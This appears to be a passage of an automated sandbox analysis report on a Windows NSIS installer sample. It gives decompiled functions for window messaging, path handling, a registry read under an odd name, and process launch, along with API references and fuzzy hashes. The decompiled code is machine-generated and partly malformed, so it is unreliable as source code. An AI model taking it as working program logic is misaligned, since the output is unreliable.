				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004049C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}

0x004049ca
0x004049cf
0x004049d7
0x004049d8
0x004049e5
0x004049ed
0x004049ee
0x004049f0
0x004049f2
0x004049f4
0x004049f7
0x004049f7
0x004049fe
0x00404a04
0x00404a04
0x00404a0b
0x00404a12
0x00404a15
0x00404a18
0x00404a18
0x00404a1c
0x00404a2c
0x00404a2e
0x00404a31
0x004049da
0x004049da
0x004049e1
0x004049e1
0x00404a39
0x00404a44
0x00404a5a
0x00404a6a
0x00404a86

APIs

lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
wsprintfA.USER32 ref: 00404A6A
SetDlgItemTextA.USER32 ref: 00404A7D

Strings

%u.%u%s%s, xrefs: 00404A4C

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405a90
0x00405aa7
0x00405aaf
0x00405aaf
0x00405ab7

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}

0x00402e44
0x00402e64
0x00402e6e
0x00402e7a
0x00402e8b
0x00402e94
0x00000000
0x00402e99
0x00402ea0
0x00402e66
0x00402e6d
0x00402e6d
0x00402e46
0x00402e46
0x00402e4d
0x00402e50
0x00402e50
0x00402e56
0x00402e5d
0x00402e5d

APIs

DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405b89
0x00405b94
0x00405b98
0x00405b9f
0x00405bab
0x00405bb7
0x00405bb7
0x00405bcf
0x00405bd0
0x00405bd7
0x00405bd8
0x00000000
0x00000000
0x00405bbb
0x00405bc2
0x00405bca
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bc2
0x00405bda
0x00000000
0x00405bee
0x00405bad
0x00405bb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bb1
0x00405b9a
0x00000000

APIs

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Kibris Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-823278215
Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}

0x00405196
0x004051a0
0x004051bc
0x004051de
0x004051e1
0x004051e7
0x004051f1
0x004051f2
0x004051f4
0x004051fa
0x004051fa
0x00405204
0x00000000
0x00405212
0x004051c9
0x00405201
0x00405201
0x00000000
0x00405201
0x004051d5
0x004051d7
0x00000000
0x004051d7
0x004051a6
0x00000000
0x00000000
0x004051ad
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004051C1
CallWindowProcA.USER32 ref: 00405212

Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9

Strings

, xrefs: 004051A2

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405fec
0x00405fee
0x00406006
0x0040600b
0x00406010
0x0040604d
0x0040604d
0x00406012
0x00406024
0x0040602f
0x00406035
0x0040603f
0x00000000
0x00000000
0x0040603f
0x00406052

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,KXCJDFJSKF,0042A070,?,?,?,00000002,KXCJDFJSKF,?,00406293,80000002), ref: 00406024
RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,KXCJDFJSKF,KXCJDFJSKF,KXCJDFJSKF,?,0042A070), ref: 0040602F

Strings

KXCJDFJSKF, xrefs: 00405FE1, 00406015

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: KXCJDFJSKF
API String ID: 3356406503-1579689790
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040579f
0x004057bf
0x004057c7
0x004057cc
0x00000000
0x004057d2
0x004057d6

APIs

CreateProcessA.KERNEL32 ref: 004057BF
CloseHandle.KERNEL32(?), ref: 004057CC

Strings

Error launching installer, xrefs: 004057A9

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}

0x00403876
0x0040387e
0x00403885
0x00403888
0x00403888
0x0040388a
0x0040388f
0x00403896
0x0040389c
0x004038a0
0x004038a1
0x004038a9

APIs

FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
GlobalFree.KERNEL32 ref: 00403896

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403875

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
